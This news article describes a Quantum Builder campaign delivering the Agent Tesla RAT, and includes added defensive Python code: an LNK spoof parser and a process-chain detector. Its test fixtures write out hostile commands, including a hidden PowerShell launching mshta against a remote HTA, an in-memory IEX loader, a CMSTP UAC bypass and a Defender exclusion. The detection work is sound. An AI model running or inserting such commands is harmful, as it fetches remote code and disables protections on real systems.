Malware builder uses new tactics to hit victims with Agent Tesla RAT – CSO Online


A recently discovered malware builder sold on the dark web, Quantum Builder, is being used in a new campaign that features fresh tactics for delivering the Agent Tesla .NET-based keylogger and remote access trojan (RAT), according to an alert issued by the ThreatLabz research unit of cybersecurity firm Zscaler.

Quantum Builder, also known as Quantum LNK Builder, is used to create malicious shortcut files. It has been linked to Lazarus, an APT (advanced persistent threat) actor associated with North Korea, because of shared tactics, techniques, and procedures (TTPs) and source code overlap. “However, we cannot confidently attribute this campaign to any specific threat actor,” Zscaler noted in a blog post.

Agent Tesla was first detected in 2014. In the current campaign, Quantum Builder is being used to generate malicious .lnk, .hta, and PowerShell payloads, which then deliver Agent Tesla to the targeted machines, according to Zscaler.

“This campaign features enhancements and a shift towards LNK (Windows shortcut) files when compared to similar attacks in the past,” Zscaler noted.

Quantum Builder used in a string of recent malware attacks

Threat actors are continually evolving their tactics and making use of malware builders sold on the cybercrime market. “This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations,” Zscaler noted.

The payloads generated by the builder use sophisticated techniques such as a user account control (UAC) bypass that abuses the Microsoft Connection Manager Profile Installer (CMSTP) binary to execute the final payload with administrative privileges and to add Windows Defender exclusions.

The new campaign has also been seen employing a multistage infection chain that combines several attack vectors, Zscaler said. It executes PowerShell scripts in memory to evade detection and has also been seen running decoys to distract victims after devices have been infected.

New attacks begin with a spear-phishing email

The attack chain begins with a spear-phishing email that contains a GZIP attachment. The GZIP holds a shortcut designed to execute PowerShell code that is responsible for launching a remote HTML application using the mshta.exe binary.

The phishing email appears to come from a Chinese supplier of lump and rock sugar: it carries the subject line “New Order Confirmation – Guangdong Nanz Technology co. ltd.” and a malicious .lnk file with a PDF icon.
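The PDF-icon shortcut described above is worth inspecting before anyone double-clicks it. The following is an added example for this article, not code from Zscaler or from the Quantum Builder tooling: a minimal parser for the Shell Link (.lnk) format that pulls out the target, arguments, icon source and window state, plus a heuristic that flags a shortcut whose icon claims to be a document while its target is a script host. The sample shortcut, its paths and the example.invalid URL are constructed here; a builder-generated LNK may also carry an item ID list and extra data blocks, which the parser skips without interpreting them.

```python
"""Minimal Shell Link (.lnk) parser with an icon/target mismatch check.

Added example for this article; it is not Zscaler's or Quantum Builder's
code. Field offsets follow the MS-SHLLINK specification. The sample
shortcut is constructed below to stand in for the PDF-iconed LNK the
campaign uses; the paths and URL in it are invented.
"""
import struct

# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7  # ShowCommand that starts the target minimized

STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

SCRIPT_HOSTS = ("powershell", "pwsh", "mshta", "cmd.exe", "wscript", "cscript", "rundll32", "cmstp")
DOCUMENT_ICON_HINTS = (".pdf", "acrobat", "acrord", "winword", "excel")


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand, IconIndex and the StringData fields of a Shell Link."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    icon_index, show_command = struct.unpack_from("<iI", data, 56)
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (uint16) followed by the item ID list
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:  # LinkInfoSize (uint32) covers the whole LinkInfo structure
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    width = 2 if flags & IS_UNICODE else 1
    info = {"icon_index": icon_index, "show_command": show_command}
    for key, bit in STRING_FIELDS:  # each present string: CountCharacters (uint16) + chars
        info[key] = ""
        if flags & bit:
            count, = struct.unpack_from("<H", data, pos)
            raw = data[pos + 2:pos + 2 + count * width]
            pos += 2 + count * width
            info[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return info


def build_lnk(relative_path: str, arguments: str, icon_location: str,
              icon_index: int = 0, show_command: int = 1) -> bytes:
    """Construct a minimal Unicode Shell Link (no IDList, no LinkInfo) for testing."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, icon_index, show_command, 0, 0, 0, 0)

    def s(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    # Trailing 4 zero bytes is the ExtraData TerminalBlock.
    return header + s(relative_path) + s(arguments) + s(icon_location) + b"\x00\x00\x00\x00"


def spoof_verdict(info: dict) -> list:
    """Reasons a parsed shortcut looks like a document-disguised launcher."""
    target = (info["relative_path"] + " " + info["arguments"]).lower()
    icon = info["icon_location"].lower()
    launches_script_host = any(h in target for h in SCRIPT_HOSTS)
    reasons = []
    if launches_script_host and any(h in icon for h in DOCUMENT_ICON_HINTS):
        reasons.append("document icon but target is a script host")
    if launches_script_host and info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("script host launched minimized")
    if "mshta" in target and "http" in target:
        reasons.append("mshta fetches a remote HTA")
    return reasons


# Constructed sample: borrows Acrobat's icon, launches PowerShell minimized, pulls a remote HTA.
SAMPLE = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments=r"-w hidden -c mshta http://example.invalid/order.hta",
    icon_location=r"%ProgramFiles%\Adobe\Acrobat\Acrobat.exe",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN = build_lnk(relative_path=r"..\notes.txt", arguments="", icon_location="")

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE), ("benign", BENIGN)):
        info = parse_lnk(blob)
        print(label, info["relative_path"], info["arguments"], spoof_verdict(info))
```

The heuristic is deliberately coarse: an icon pointing at a document viewer, a minimized window and a script-host target are each legitimate on their own, so the verdict lists every reason and leaves the threshold to the analyst. Because the parser reads only the header and StringData, it also works on shortcuts whose actual target lives in the item ID list rather than the relative path; in that case `arguments` and `icon_location` still carry the useful signal.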

Once the document is opened, the HTA file decrypts a PowerShell loader script, which in turn decrypts and loads another PowerShell script after performing Advanced Encryption Standard (AES) decryption and GZIP decompression.

The decrypted PowerShell script is the downloader PS script, which first fetches the Agent Tesla binary from a remote server and then runs it with administrative privileges by performing a user account control (UAC) bypass using CMSTP. Agent Tesla thus ends up executing on the target machine with administrative privileges.
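The chain in the preceding paragraphs (shortcut to PowerShell, remote HTA via mshta.exe, in-memory AES/GZIP loader, CMSTP UAC bypass, Defender exclusions) leaves a distinctive sequence of process creations. As an added example, not Zscaler's detection content, the script below labels each stage from Sysmon-style process-creation events and raises one alert per host once several stages line up. The events, host names and command lines are constructed to match the behaviours the article describes; no real sample's command lines are used.

```python
"""Stage-by-stage detection for the LNK -> PowerShell -> mshta -> CMSTP chain.

Added example for this article, not Zscaler's detection logic. It runs over
a handful of constructed Sysmon-style process-creation events (image,
parent image, command line). The hosts, PIDs and command lines are
invented to mirror the behaviours the article describes.
"""
import re
from collections import defaultdict

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def stage_of(ev: dict):
    """Return the chain stage one event represents, or None if it is unremarkable."""
    image, parent, cmd = _base(ev["image"]), _base(ev["parent_image"]), ev["cmdline"].lower()
    # Stage 1: the shortcut's PowerShell launches mshta against a remote HTA.
    if image == "mshta.exe" and parent in SCRIPT_HOSTS and re.search(r"https?://", cmd):
        return "remote_hta_via_script_host"
    # Stage 2: the HTA's loader decodes, decrypts and decompresses a script in memory.
    if image in ("powershell.exe", "pwsh.exe") and "frombase64string" in cmd and \
            re.search(r"gzipstream|createdecryptor|aesmanaged|invoke-expression|\biex\b", cmd):
        return "inmemory_decrypt_loader"
    # Stage 3: CMSTP fed an INF file by a script host (UAC bypass, MITRE T1218.003).
    if image == "cmstp.exe" and ".inf" in cmd and parent in SCRIPT_HOSTS:
        return "cmstp_launched_by_script"
    # Stage 4: whatever CMSTP hands off to runs with the elevation it obtained.
    if parent == "cmstp.exe":
        return "cmstp_child_process"
    # Stage 5: Defender exclusions added from the command line.
    if re.search(r"add-mppreference.*-exclusion(path|process|extension)", cmd):
        return "defender_exclusion_added"
    return None


def detect(events):
    """Return (hits, stages_by_host): hits are (host, pid, stage) tuples."""
    hits, stages = [], defaultdict(set)
    for ev in events:
        stage = stage_of(ev)
        if stage:
            hits.append((ev["host"], ev["pid"], stage))
            stages[ev["host"]].add(stage)
    return hits, dict(stages)


def chain_alert(stages_by_host: dict, threshold: int = 3) -> set:
    """Hosts on which at least `threshold` distinct stages fired: one intrusion alert each."""
    return {host for host, seen in stages_by_host.items() if len(seen) >= threshold}


def _ev(host, pid, parent, image, cmdline):
    return {"host": host, "pid": pid, "parent_image": parent, "image": image, "cmdline": cmdline}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed; ws01 is the victim, ws02 shows benign look-alikes
    _ev("ws01", 4100, r"C:\Windows\explorer.exe", PS,
        'powershell.exe -w hidden -c "mshta http://example.invalid/order.hta"'),
    _ev("ws01", 4120, PS, r"C:\Windows\System32\mshta.exe",
        "mshta http://example.invalid/order.hta"),
    _ev("ws01", 4130, r"C:\Windows\System32\mshta.exe", PS,
        'powershell -nop -w hidden -c "$d=[Convert]::FromBase64String(\'QUFB\');'
        'IEX ([IO.StreamReader]::new([IO.Compression.GZipStream]::new('
        '[IO.MemoryStream]::new($d),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"'),
    _ev("ws01", 4140, PS, r"C:\Windows\System32\cmstp.exe",
        r"cmstp.exe /ni /s C:\Users\Public\profile.inf"),
    _ev("ws01", 4150, r"C:\Windows\System32\cmstp.exe", r"C:\Users\Public\update.exe",
        r"C:\Users\Public\update.exe"),
    _ev("ws01", 4160, PS, PS,
        r'powershell -c "Add-MpPreference -ExclusionPath C:\Users\Public"'),
    _ev("ws02", 5100, r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmstp.exe",
        r"cmstp.exe /s C:\ProgramData\VPN\corp.inf"),
    _ev("ws02", 5110, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mshta.exe",
        r'mshta.exe "C:\Program Files\App\setup.hta"'),
]

if __name__ == "__main__":
    hits, stages = detect(SAMPLE_EVENTS)
    for hit in hits:
        print(hit)
    print("alert hosts:", chain_alert(stages))
```

The explorer-to-PowerShell launch (the first event) is deliberately not a stage on its own, since users start PowerShell from shortcuts legitimately; the mshta child that fetches a URL and the base64/GZIP loader are what fire. Likewise a CMSTP run from Explorer with a VPN profile, or mshta opening a local HTA, stays quiet on ws02, while the five correlated stages on ws01 exceed the threshold and produce a single alert for the host.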

A second variant of Agent Tesla was also observed, in which the threat actors used a ZIP file and other sophisticated methods to hide their activity. Agent Tesla has been active since 2014; in 2018 it had more than 6,300 customers paying subscription fees to license the software. Currently, Agent Tesla is being sold for $182 a month on the dark web, according to The Hacker News.

Quantum Builder was first discovered by Cyble Research Labs in June this year on a cybercrime forum. The threat actor claimed in the post that Quantum Builder can spoof any extension and has over 300 different icons available for malicious .lnk files. A video was also posted demonstrating how to build .lnk, .hta, and .iso files with the malware builder.

The .hta payload can be created in Quantum Builder by customizing options such as the payload URL, DLL (dynamic link library), UAC bypass, and execution path details, as well as a time delay before the payload executes.

Copyright © 2022 IDG Communications, Inc.

